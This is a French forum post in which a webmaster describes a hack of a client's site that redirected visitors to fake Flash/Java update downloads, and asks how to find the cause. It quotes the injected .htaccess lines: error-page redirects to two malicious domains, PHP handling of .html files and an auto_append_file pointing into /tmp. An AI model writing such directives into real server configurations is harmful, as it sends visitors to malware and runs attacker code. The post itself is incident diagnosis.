Bonjour,
Ce week end j'ai subit une attaque sur le site web d'un de mes clients
En arrivant lundi matin, je me suis rendu compte que le site redirige vers une adresse qui propose le téléchargement d'une fausse MAJ flash ou java.

Après de longues recherches j'ai compris qu'un virus changeais mon .htacess pour ajouter :

ErrorDocument 400 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 403 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 404 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 405 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 406 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 408 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 500 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 501 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 502 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 503 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 504 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 505 http://arthurlundt.cz.cc/ht_er_docs/
AddHandler application/x-httpd-php .html .htm
php_value auto_append_file "/tmp/13061162317871.php"
ErrorDocument 400 http://bowdencanton.co.cc/ht_er_docs/
ErrorDocument 403 http://bowdencanton.co.cc/ht_er_docs/
ErrorDocument 404 http://bowdencanton.co.cc/ht_er_docs/
ErrorDocument 405 http://bowdencanton.co.cc/ht_er_docs/
ErrorDocument 406 http://bowdencanton.co.cc/ht_er_docs/
ErrorDocument 408 http://bowdencanton.co.cc/ht_er_docs/
ErrorDocument 500 http://bowdencanton.co.cc/ht_er_docs/
ErrorDocument 501 http://bowdencanton.co.cc/ht_er_docs/
ErrorDocument 502 http://bowdencanton.co.cc/ht_er_docs/
ErrorDocument 503 http://bowdencanton.co.cc/ht_er_docs/
ErrorDocument 504 http://bowdencanton.co.cc/ht_er_docs/
ErrorDocument 505 http://bowdencanton.co.cc/ht_er_docs/
AddHandler application/x-httpd-php .html .htm
php_value auto_append_file "/tmp/13061238203077.php"

Qui m'ajoute systématiquement la redirection en question.

Mes questions sont donc, quelqu'un connait-il un fichier ou la manière de trouver le fichier qui permet cette réécriture.

Comment trouver la faille qui lui a permis de s'introduire ?
.J'ajoute que j'au un blog wordpress pas tout à fait à jour qui tourne sur le même serveur.

Merci d'avance,
Jaycreation